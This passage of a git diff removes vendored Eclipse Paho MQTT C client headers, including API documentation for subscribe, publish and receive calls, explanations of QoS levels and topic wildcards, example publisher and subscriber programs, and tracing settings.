-   Returns return code, MQTTCLIENT_SUCCESS == success, non-zero some sort of error (TBD) */
-
-/**
-  * This function attempts to subscribe a client to a single topic, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for the subscription
-  * (see also MQTTClient_subscribeMany()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topic The subscription topic, which may include wildcards.
-  * @param qos The requested quality of service for the subscription.
-  * @return ::MQTTCLIENT_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscription.
-  */
-DLLExport int MQTTClient_subscribe(MQTTClient handle, const char* topic, int qos);
-
-/**
-  * This function attempts to subscribe a client to a list of topics, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for each topic (see also MQTTClient_subscribe()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param count The number of topics for which the client is requesting
-  * subscriptions.
-  * @param topic An array (of length <i>count</i>) of pointers to
-  * topics, each of which may include wildcards.
-  * @param qos An array (of length <i>count</i>) of @ref qos
-  * values. qos[n] is the requested QoS for topic[n].
-  * @return ::MQTTCLIENT_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscriptions.
-  */
-DLLExport int MQTTClient_subscribeMany(MQTTClient handle, int count, char* const* topic, int* qos);
-
-/**
-  * This function attempts to remove an existing subscription made by the
-  * specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topic The topic for the subscription to be removed, which may
-  * include wildcards (see @ref wildcard).
-  * @return ::MQTTCLIENT_SUCCESS if the subscription is removed.
-  * An error code is returned if there was a problem removing the
-  * subscription.
-  */
-DLLExport int MQTTClient_unsubscribe(MQTTClient handle, const char* topic);
-
-/**
-  * This function attempts to remove existing subscriptions to a list of topics
-  * made by the specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param count The number subscriptions to be removed.
-  * @param topic An array (of length <i>count</i>) of pointers to the topics of
-  * the subscriptions to be removed, each of which may include wildcards.
-  * @return ::MQTTCLIENT_SUCCESS if the subscriptions are removed.
-  * An error code is returned if there was a problem removing the subscriptions.
-  */
-DLLExport int MQTTClient_unsubscribeMany(MQTTClient handle, int count, char* const* topic);
-
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * MQTTClient_publishMessage()). An ::MQTTClient_deliveryToken is issued when
-  * this function returns successfully. If the client application needs to
-  * test for succesful delivery of QoS1 and QoS2 messages, this can be done
-  * either asynchronously or synchronously (see @ref async,
-  * ::MQTTClient_waitForCompletion and MQTTClient_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topicName The topic associated with this message.
-  * @param payloadlen The length of the payload in bytes.
-  * @param payload A pointer to the byte array payload of the message.
-  * @param qos The @ref qos of the message.
-  * @param retained The retained flag for the message.
-  * @param dt A pointer to an ::MQTTClient_deliveryToken. This is populated
-  * with a token representing the message when the function returns
-  * successfully. If your application does not use delivery tokens, set this
-  * argument to NULL.
-  * @return ::MQTTCLIENT_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTClient_publish(MQTTClient handle, const char* topicName, int payloadlen, void* payload, int qos, int retained,
-																 MQTTClient_deliveryToken* dt);
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * MQTTClient_publish()). An ::MQTTClient_deliveryToken is issued when
-  * this function returns successfully. If the client application needs to
-  * test for succesful delivery of QoS1 and QoS2 messages, this can be done
-  * either asynchronously or synchronously (see @ref async,
-  * ::MQTTClient_waitForCompletion and MQTTClient_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topicName The topic associated with this message.
-  * @param msg A pointer to a valid MQTTClient_message structure containing
-  * the payload and attributes of the message to be published.
-  * @param dt A pointer to an ::MQTTClient_deliveryToken. This is populated
-  * with a token representing the message when the function returns
-  * successfully. If your application does not use delivery tokens, set this
-  * argument to NULL.
-  * @return ::MQTTCLIENT_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTClient_publishMessage(MQTTClient handle, const char* topicName, MQTTClient_message* msg, MQTTClient_deliveryToken* dt);
-
-
-/**
-  * This function is called by the client application to synchronize execution
-  * of the main thread with completed publication of a message. When called,
-  * MQTTClient_waitForCompletion() blocks execution until the message has been
-  * successful delivered or the specified timeout has expired. See @ref async.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param dt The ::MQTTClient_deliveryToken that represents the message being
-  * tested for successful delivery. Delivery tokens are issued by the
-  * publishing functions MQTTClient_publish() and MQTTClient_publishMessage().
-  * @param timeout The maximum time to wait in milliseconds.
-  * @return ::MQTTCLIENT_SUCCESS if the message was successfully delivered.
-  * An error code is returned if the timeout expires or there was a problem
-  * checking the token.
-  */
-DLLExport int MQTTClient_waitForCompletion(MQTTClient handle, MQTTClient_deliveryToken dt, unsigned long timeout);
-
-
-/**
-  * This function sets a pointer to an array of delivery tokens for
-  * messages that are currently in-flight (pending completion).
-  *
-  * <b>Important note:</b> The memory used to hold the array of tokens is
-  * malloc()'d in this function. The client application is responsible for
-  * freeing this memory when it is no longer required.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param tokens The address of a pointer to an ::MQTTClient_deliveryToken.
-  * When the function returns successfully, the pointer is set to point to an
-  * array of tokens representing messages pending completion. The last member of
-  * the array is set to -1 to indicate there are no more tokens. If no tokens
-  * are pending, the pointer is set to NULL.
-  * @return ::MQTTCLIENT_SUCCESS if the function returns successfully.
-  * An error code is returned if there was a problem obtaining the list of
-  * pending tokens.
-  */
-DLLExport int MQTTClient_getPendingDeliveryTokens(MQTTClient handle, MQTTClient_deliveryToken **tokens);
-
-/**
-  * When implementing a single-threaded client, call this function periodically
-  * to allow processing of message retries and to send MQTT keepalive pings.
-  * If the application is calling MQTTClient_receive() regularly, then it is
-  * not necessary to call this function.
-  */
-DLLExport void MQTTClient_yield(void);
-
-/**
-  * This function performs a synchronous receive of incoming messages. It should
-  * be used only when the client application has not set callback methods to
-  * support asynchronous receipt of messages (see @ref async and
-  * MQTTClient_setCallbacks()). Using this function allows a single-threaded
-  * client subscriber application to be written. When called, this function
-  * blocks until the next message arrives or the specified timeout expires
-  *(see also MQTTClient_yield()).
-  *
-  * <b>Important note:</b> The application must free() the memory allocated
-  * to the topic and the message when processing is complete (see
-  * MQTTClient_freeMessage()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topicName The address of a pointer to a topic. This function
-  * allocates the memory for the topic and returns it to the application
-  * by setting <i>topicName</i> to point to the topic.
-  * @param topicLen The length of the topic. If the return code from this
-  * function is ::MQTTCLIENT_TOPICNAME_TRUNCATED, the topic contains embedded
-  * NULL characters and the full topic should be retrieved by using
-  * <i>topicLen</i>.
-  * @param message The address of a pointer to the received message. This
-  * function allocates the memory for the message and returns it to the
-  * application by setting <i>message</i> to point to the received message.
-  * The pointer is set to NULL if the timeout expires.
-  * @param timeout The length of time to wait for a message in milliseconds.
-  * @return ::MQTTCLIENT_SUCCESS or ::MQTTCLIENT_TOPICNAME_TRUNCATED if a
-  * message is received. ::MQTTCLIENT_SUCCESS can also indicate that the
-  * timeout expired, in which case <i>message</i> is NULL. An error code is
-  * returned if there was a problem trying to receive a message.
-  */
-DLLExport int MQTTClient_receive(MQTTClient handle, char** topicName, int* topicLen, MQTTClient_message** message,
-		unsigned long timeout);
-
-/**
-  * This function frees memory allocated to an MQTT message, including the
-  * additional memory allocated to the message payload. The client application
-  * calls this function when the message has been fully processed. <b>Important
-  * note:</b> This function does not free the memory allocated to a message
-  * topic string. It is the responsibility of the client application to free
-  * this memory using the MQTTClient_free() library function.
-  * @param msg The address of a pointer to the ::MQTTClient_message structure
-  * to be freed.
-  */
-DLLExport void MQTTClient_freeMessage(MQTTClient_message** msg);
-
-/**
-  * This function frees memory allocated by the MQTT C client library, especially the
-  * topic name. This is needed on Windows when the client libary and application
-  * program have been compiled with different versions of the C compiler.  It is
-  * thus good policy to always use this function when freeing any MQTT C client-
-  * allocated memory.
-  * @param ptr The pointer to the client library storage to be freed.
-  */
-DLLExport void MQTTClient_free(void* ptr);
-
-/**
-  * This function frees the memory allocated to an MQTT client (see
-  * MQTTClient_create()). It should be called when the client is no longer
-  * required.
-  * @param handle A pointer to the handle referring to the ::MQTTClient
-  * structure to be freed.
-  */
-DLLExport void MQTTClient_destroy(MQTTClient* handle);
-
-#endif
-#ifdef __cplusplus
-     }
-#endif
-
-/**
-  * @cond MQTTClient_main
-  * @page async Asynchronous vs synchronous client applications
-  * The client library supports two modes of operation. These are referred to
-  * as <b>synchronous</b> and <b>asynchronous</b> modes. If your application
-  * calls MQTTClient_setCallbacks(), this puts the client into asynchronous
-  * mode, otherwise it operates in synchronous mode.
-  *
-  * In synchronous mode, the client application runs on a single thread.
-  * Messages are published using the MQTTClient_publish() and
-  * MQTTClient_publishMessage() functions. To determine that a QoS1 or QoS2
-  * (see @ref qos) message has been successfully delivered, the application
-  * must call the MQTTClient_waitForCompletion() function. An example showing
-  * synchronous publication is shown in @ref pubsync. Receiving messages in
-  * synchronous mode uses the MQTTClient_receive() function. Client applications
-  * must call either MQTTClient_receive() or MQTTClient_yield() relatively
-  * frequently in order to allow processing of acknowledgements and the MQTT
-  * "pings" that keep the network connection to the server alive.
-  *
-  * In asynchronous mode, the client application runs on several threads. The
-  * main program calls functions in the client library to publish and subscribe,
-  * just as for the synchronous mode. Processing of handshaking and maintaining
-  * the network connection is performed in the background, however.
-  * Notifications of status and message reception are provided to the client
-  * application using callbacks registered with the library by the call to
-  * MQTTClient_setCallbacks() (see MQTTClient_messageArrived(),
-  * MQTTClient_connectionLost() and MQTTClient_deliveryComplete()).
-  * This API is not thread safe however - it is not possible to call it from multiple
-  * threads without synchronization.  You can use the MQTTAsync API for that.
-  *
-  * @page wildcard Subscription wildcards
-  * Every MQTT message includes a topic that classifies it. MQTT servers use
-  * topics to determine which subscribers should receive messages published to
-  * the server.
-  *
-  * Consider the server receiving messages from several environmental sensors.
-  * Each sensor publishes its measurement data as a message with an associated
-  * topic. Subscribing applications need to know which sensor originally
-  * published each received message. A unique topic is thus used to identify
-  * each sensor and measurement type. Topics such as SENSOR1TEMP,
-  * SENSOR1HUMIDITY, SENSOR2TEMP and so on achieve this but are not very
-  * flexible. If additional sensors are added to the system at a later date,
-  * subscribing applications must be modified to receive them.
-  *
-  * To provide more flexibility, MQTT supports a hierarchical topic namespace.
-  * This allows application designers to organize topics to simplify their
-  * management. Levels in the hierarchy are delimited by the '/' character,
-  * such as SENSOR/1/HUMIDITY. Publishers and subscribers use these
-  * hierarchical topics as already described.
-  *
-  * For subscriptions, two wildcard characters are supported:
-  * <ul>
-  * <li>A '#' character represents a complete sub-tree of the hierarchy and
-  * thus must be the last character in a subscription topic string, such as
-  * SENSOR/#. This will match any topic starting with SENSOR/, such as
-  * SENSOR/1/TEMP and SENSOR/2/HUMIDITY.</li>
-  * <li> A '+' character represents a single level of the hierarchy and is
-  * used between delimiters. For example, SENSOR/+/TEMP will match
-  * SENSOR/1/TEMP and SENSOR/2/TEMP.</li>
-  * </ul>
-  * Publishers are not allowed to use the wildcard characters in their topic
-  * names.
-  *
-  * Deciding on your topic hierarchy is an important step in your system design.
-  *
-  * @page qos Quality of service
-  * The MQTT protocol provides three qualities of service for delivering
-  * messages between clients and servers: "at most once", "at least once" and
-  * "exactly once".
-  *
-  * Quality of service (QoS) is an attribute of an individual message being
-  * published. An application sets the QoS for a specific message by setting the
-  * MQTTClient_message.qos field to the required value.
-  *
-  * A subscribing client can set the maximum quality of service a server uses
-  * to send messages that match the client subscriptions. The
-  * MQTTClient_subscribe() and MQTTClient_subscribeMany() functions set this
-  * maximum. The QoS of a message forwarded to a subscriber thus might be
-  * different to the QoS given to the message by the original publisher.
-  * The lower of the two values is used to forward a message.
-  *
-  * The three levels are:
-  *
-  * <b>QoS0, At most once:</b> The message is delivered at most once, or it
-  * may not be delivered at all. Its delivery across the network is not
-  * acknowledged. The message is not stored. The message could be lost if the
-  * client is disconnected, or if the server fails. QoS0 is the fastest mode of
-  * transfer. It is sometimes called "fire and forget".
-  *
-  * The MQTT protocol does not require servers to forward publications at QoS0
-  * to a client. If the client is disconnected at the time the server receives
-  * the publication, the publication might be discarded, depending on the
-  * server implementation.
-  *
-  * <b>QoS1, At least once:</b> The message is always delivered at least once.
-  * It might be delivered multiple times if there is a failure before an
-  * acknowledgment is received by the sender. The message must be stored
-  * locally at the sender, until the sender receives confirmation that the
-  * message has been published by the receiver. The message is stored in case
-  * the message must be sent again.
-  *
-  * <b>QoS2, Exactly once:</b> The message is always delivered exactly once.
-  * The message must be stored locally at the sender, until the sender receives
-  * confirmation that the message has been published by the receiver. The
-  * message is stored in case the message must be sent again. QoS2 is the
-  * safest, but slowest mode of transfer. A more sophisticated handshaking
-  * and acknowledgement sequence is used than for QoS1 to ensure no duplication
-  * of messages occurs.
-  * @page pubsync Synchronous publication example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for up to %d seconds for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            (int)(TIMEOUT/1000), PAYLOAD, TOPIC, CLIENTID);
-    rc = MQTTClient_waitForCompletion(client, token, TIMEOUT);
-    printf("Message with delivery token %d delivered\n", token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
-
-  * @endcode
-  *
-  * @page pubasync Asynchronous publication example
-@code{.c}
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    MQTTClient_message pubmsg = MQTTClient_message_initializer;
-    MQTTClient_deliveryToken token;
-    int rc;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    pubmsg.payload = PAYLOAD;
-    pubmsg.payloadlen = strlen(PAYLOAD);
-    pubmsg.qos = QOS;
-    pubmsg.retained = 0;
-    deliveredtoken = 0;
-    MQTTClient_publishMessage(client, TOPIC, &pubmsg, &token);
-    printf("Waiting for publication of %s\n"
-            "on topic %s for client with ClientID: %s\n",
-            PAYLOAD, TOPIC, CLIENTID);
-    while(deliveredtoken != token);
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
-
-  * @endcode
-  * @page subasync Asynchronous subscription example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTClient.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTClient_deliveryToken deliveredtoken;
-
-void delivered(void *context, MQTTClient_deliveryToken dt)
-{
-    printf("Message with token value %d delivery confirmed\n", dt);
-    deliveredtoken = dt;
-}
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTClient_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTClient_freeMessage(&message);
-    MQTTClient_free(topicName);
-    return 1;
-}
-
-void connlost(void *context, char *cause)
-{
-    printf("\nConnection lost\n");
-    printf("     cause: %s\n", cause);
-}
-
-int main(int argc, char* argv[])
-{
-    MQTTClient client;
-    MQTTClient_connectOptions conn_opts = MQTTClient_connectOptions_initializer;
-    int rc;
-    int ch;
-
-    MQTTClient_create(&client, ADDRESS, CLIENTID,
-        MQTTCLIENT_PERSISTENCE_NONE, NULL);
-    conn_opts.keepAliveInterval = 20;
-    conn_opts.cleansession = 1;
-
-    MQTTClient_setCallbacks(client, NULL, connlost, msgarrvd, delivered);
-
-    if ((rc = MQTTClient_connect(client, &conn_opts)) != MQTTCLIENT_SUCCESS)
-    {
-        printf("Failed to connect, return code %d\n", rc);
-        exit(EXIT_FAILURE);
-    }
-    printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-    MQTTClient_subscribe(client, TOPIC, QOS);
-
-    do
-    {
-        ch = getchar();
-    } while(ch!='Q' && ch != 'q');
-
-    MQTTClient_disconnect(client, 10000);
-    MQTTClient_destroy(&client);
-    return rc;
-}
-
-  * @endcode
-  * @page tracing Tracing
-  *
-  * Runtime tracing is controlled by environment variables.
-  *
-  * Tracing is switched on by setting MQTT_C_CLIENT_TRACE.  A value of ON, or stdout, prints to
-  * stdout, any other value is interpreted as a file name to use.
-  *
-  * The amount of trace detail is controlled with the MQTT_C_CLIENT_TRACE_LEVEL environment
-  * variable - valid values are ERROR, PROTOCOL, MINIMUM, MEDIUM and MAXIMUM
-  * (from least to most verbose).
-  *
-  * The variable MQTT_C_CLIENT_TRACE_MAX_LINES limits the number of lines of trace that are output
-  * to a file.  Two files are used at most, when they are full, the last one is overwritten with the
-  * new trace entries.  The default size is 1000 lines.
-  *
-  * ### MQTT Packet Tracing
-  *
-  * A feature that can be very useful is printing the MQTT packets that are sent and received.  To
-  * achieve this, use the following environment variable settings:
-  * @code
-    MQTT_C_CLIENT_TRACE=ON
-    MQTT_C_CLIENT_TRACE_LEVEL=PROTOCOL
-  * @endcode
-  * The output you should see looks like this:
-  * @code
-    20130528 155936.813 3 stdout-subscriber -> CONNECT cleansession: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- CONNACK rc: 0
-    20130528 155936.813 3 stdout-subscriber -> SUBSCRIBE msgid: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- SUBACK msgid: 1
-    20130528 155941.818 3 stdout-subscriber -> DISCONNECT (0)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. socket number
-  * 4. client id
-  * 5. direction (-> from client to server, <- from server to client)
-  * 6. packet details
-  *
-  * ### Default Level Tracing
-  *
-  * This is an extract of a default level trace of a call to connect:
-  * @code
-    19700101 010000.000 (1152206656) (0)> MQTTClient_connect:893
-    19700101 010000.000 (1152206656)  (1)> MQTTClient_connectURI:716
-    20130528 160447.479 Connecting to serverURI localhost:1883
-    20130528 160447.479 (1152206656)   (2)> MQTTProtocol_connect:98
-    20130528 160447.479 (1152206656)    (3)> MQTTProtocol_addressPort:48
-    20130528 160447.479 (1152206656)    (3)< MQTTProtocol_addressPort:73
-    20130528 160447.479 (1152206656)    (3)> Socket_new:599
-    20130528 160447.479 New socket 4 for localhost, port 1883
-    20130528 160447.479 (1152206656)     (4)> Socket_addSocket:163
-    20130528 160447.479 (1152206656)      (5)> Socket_setnonblocking:73
-    20130528 160447.479 (1152206656)      (5)< Socket_setnonblocking:78 (0)
-    20130528 160447.479 (1152206656)     (4)< Socket_addSocket:176 (0)
-    20130528 160447.479 (1152206656)     (4)> Socket_error:95
-    20130528 160447.479 (1152206656)     (4)< Socket_error:104 (115)
-    20130528 160447.479 Connect pending
-    20130528 160447.479 (1152206656)    (3)< Socket_new:683 (115)
-    20130528 160447.479 (1152206656)   (2)< MQTTProtocol_connect:131 (115)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. thread id
-  * 4. function nesting level
-  * 5. function entry (>) or exit (<)
-  * 6. function name : line of source code file
-  * 7. return value (if there is one)
-  *
-  * ### Memory Allocation Tracing
-  *
-  * Setting the trace level to maximum causes memory allocations and frees to be traced along with
-  * the default trace entries, with messages like the following:
-  * @code
-    20130528 161819.657 Allocating 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 177 ptr 0x179f930
-
-    20130528 161819.657 Freeing 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 201, heap use now 896 bytes
-  * @endcode
-  * When the last MQTT client object is destroyed, if the trace is being recorded
-  * and all memory allocated by the client library has not been freed, an error message will be
-  * written to the trace.  This can help with fixing memory leaks.  The message will look like this:
-  * @code
-    20130528 163909.208 Some memory not freed at shutdown, possible memory leak
-    20130528 163909.208 Heap scan start, total 880 bytes
-    20130528 163909.208 Heap element size 32, line 354, file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c, ptr 0x260cb00
-    20130528 163909.208   Content
-    20130528 163909.209 Heap scan end
-  * @endcode
-  * @endcond
-  */
diff --git a/thirdparty/paho.mqtt.c/src/MQTTClientPersistence.h b/thirdparty/paho.mqtt.c/src/MQTTClientPersistence.h
deleted file mode 100644
index 4c9014d..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTClientPersistence.h
+++ /dev/null
@@ -1,254 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2012 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *******************************************************************************/
-
-/**
- * @file
- * \brief This structure represents a persistent data store, used to store 
- * outbound and inbound messages, in order to achieve reliable messaging.
- *
- * The MQTT Client persists QoS1 and QoS2 messages in order to meet the
- * assurances of delivery associated with these @ref qos levels. The messages 
- * are saved in persistent storage
- * The type and context of the persistence implementation are specified when 
- * the MQTT client is created (see MQTTClient_create()). The default 
- * persistence type (::MQTTCLIENT_PERSISTENCE_DEFAULT) uses a file system-based
- * persistence mechanism. The <i>persistence_context</i> argument passed to 
- * MQTTClient_create() when using the default peristence is a string 
- * representing the location of the persistence directory. If the context 
- * argument is NULL, the working directory will be used. 
- *
- * To use memory-based persistence, an application passes 
- * ::MQTTCLIENT_PERSISTENCE_NONE as the <i>persistence_type</i> to 
- * MQTTClient_create(). This can lead to message loss in certain situations, 
- * but can be appropriate in some cases (see @ref qos).
- *
- * Client applications can provide their own persistence mechanism by passing
- * ::MQTTCLIENT_PERSISTENCE_USER as the <i>persistence_type</i>. To implement a
- * custom persistence mechanism, the application must pass an initialized
- * ::MQTTClient_persistence structure as the <i>persistence_context</i> 
- * argument to MQTTClient_create().
- *
- * If the functions defined return an ::MQTTCLIENT_PERSISTENCE_ERROR then the 
- * state of the persisted data should remain as it was prior to the function 
- * being called. For example, if Persistence_put() returns 
- * ::MQTTCLIENT_PERSISTENCE_ERROR, then it is assumed tha tthe persistent store
- * does not contain the data that was passed to the function. Similarly,  if 
- * Persistence_remove() returns ::MQTTCLIENT_PERSISTENCE_ERROR then it is 
- * assumed that the data to be removed is still held in the persistent store.
- *
- * It is up to the persistence implementation to log any error information that
- * may be required to diagnose a persistence mechanism failure.
- */
-
-/*
-/// @cond EXCLUDE
-*/
-#if !defined(MQTTCLIENTPERSISTENCE_H)
-#define MQTTCLIENTPERSISTENCE_H
-/*
-/// @endcond
-*/
-
-/**
-  * This <i>persistence_type</i> value specifies the default file system-based 
-  * persistence mechanism (see MQTTClient_create()).
-  */
-#define MQTTCLIENT_PERSISTENCE_DEFAULT 0
-/**
-  * This <i>persistence_type</i> value specifies a memory-based 
-  * persistence mechanism (see MQTTClient_create()).
-  */
-#define MQTTCLIENT_PERSISTENCE_NONE 1
-/**
-  * This <i>persistence_type</i> value specifies an application-specific 
-  * persistence mechanism (see MQTTClient_create()).
-  */
-#define MQTTCLIENT_PERSISTENCE_USER 2
-
-/** 
-  * Application-specific persistence functions must return this error code if 
-  * there is a problem executing the function. 
-  */
-#define MQTTCLIENT_PERSISTENCE_ERROR -2
-
-/**
-  * @brief Initialize the persistent store.
-  * 
-  * Either open the existing persistent store for this client ID or create a new
-  * one if one doesn't exist. If the persistent store is already open, return 
-  * without taking any action.
-  *
-  * An application can use the same client identifier to connect to many
-  * different servers. The <i>clientid</i> in conjunction with the 
-  * <i>serverURI</i> uniquely identifies the persistence store required.
-  *
-  * @param handle The address of a pointer to a handle for this persistence 
-  * implementation. This function must set handle to a valid reference to the 
-  * persistence following a successful return. 
-  * The handle pointer is passed as an argument to all the other
-  * persistence functions. It may include the context parameter and/or any other
-  * data for use by the persistence functions.
-  * @param clientID The client identifier for which the persistent store should 
-  * be opened.
-  * @param serverURI The connection string specified when the MQTT client was
-  * created (see MQTTClient_create()).
-  * @param context A pointer to any data required to initialize the persistent
-  * store (see ::MQTTClient_persistence).
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_open)(void** handle, const char* clientID, const char* serverURI, void* context);
-
-/**
-  * @brief Close the persistent store referred to by the handle.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_close)(void* handle); 
-
-/**
-  * @brief Put the specified data into the persistent store.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key A string used as the key for the data to be put in the store. The
-  * key is later used to retrieve data from the store with Persistence_get().
-  * @param bufcount The number of buffers to write to the persistence store.
-  * @param buffers An array of pointers to the data buffers associated with 
-  * this <i>key</i>.
-  * @param buflens An array of lengths of the data buffers. <i>buflen[n]</i> 
-  * gives the length of <i>buffer[n]</i>.
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_put)(void* handle, char* key, int bufcount, char* buffers[], int buflens[]);
-
-/**
-  * @brief Retrieve the specified data from the persistent store. 
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key A string that is the key for the data to be retrieved. This is 
-  * the same key used to save the data to the store with Persistence_put().
-  * @param buffer The address of a pointer to a buffer. This function sets the
-  * pointer to point at the retrieved data, if successful.
-  * @param buflen The address of an int that is set to the length of 
-  * <i>buffer</i> by this function if successful.
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_get)(void* handle, char* key, char** buffer, int* buflen);
-
-/**
-  * @brief Remove the data for the specified key from the store.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key A string that is the key for the data to be removed from the
-  * store. This is the same key used to save the data to the store with 
-  * Persistence_put().
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_remove)(void* handle, char* key);
-
-/**
-  * @brief Returns the keys in this persistent data store.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param keys The address of a pointer to pointers to strings. Assuming
-  * successful execution, this function allocates memory to hold the returned
-  * keys (strings used to store the data with Persistence_put()). It also 
-  * allocates memory to hold an array of pointers to these strings. <i>keys</i>
-  * is set to point to the array of pointers to strings.
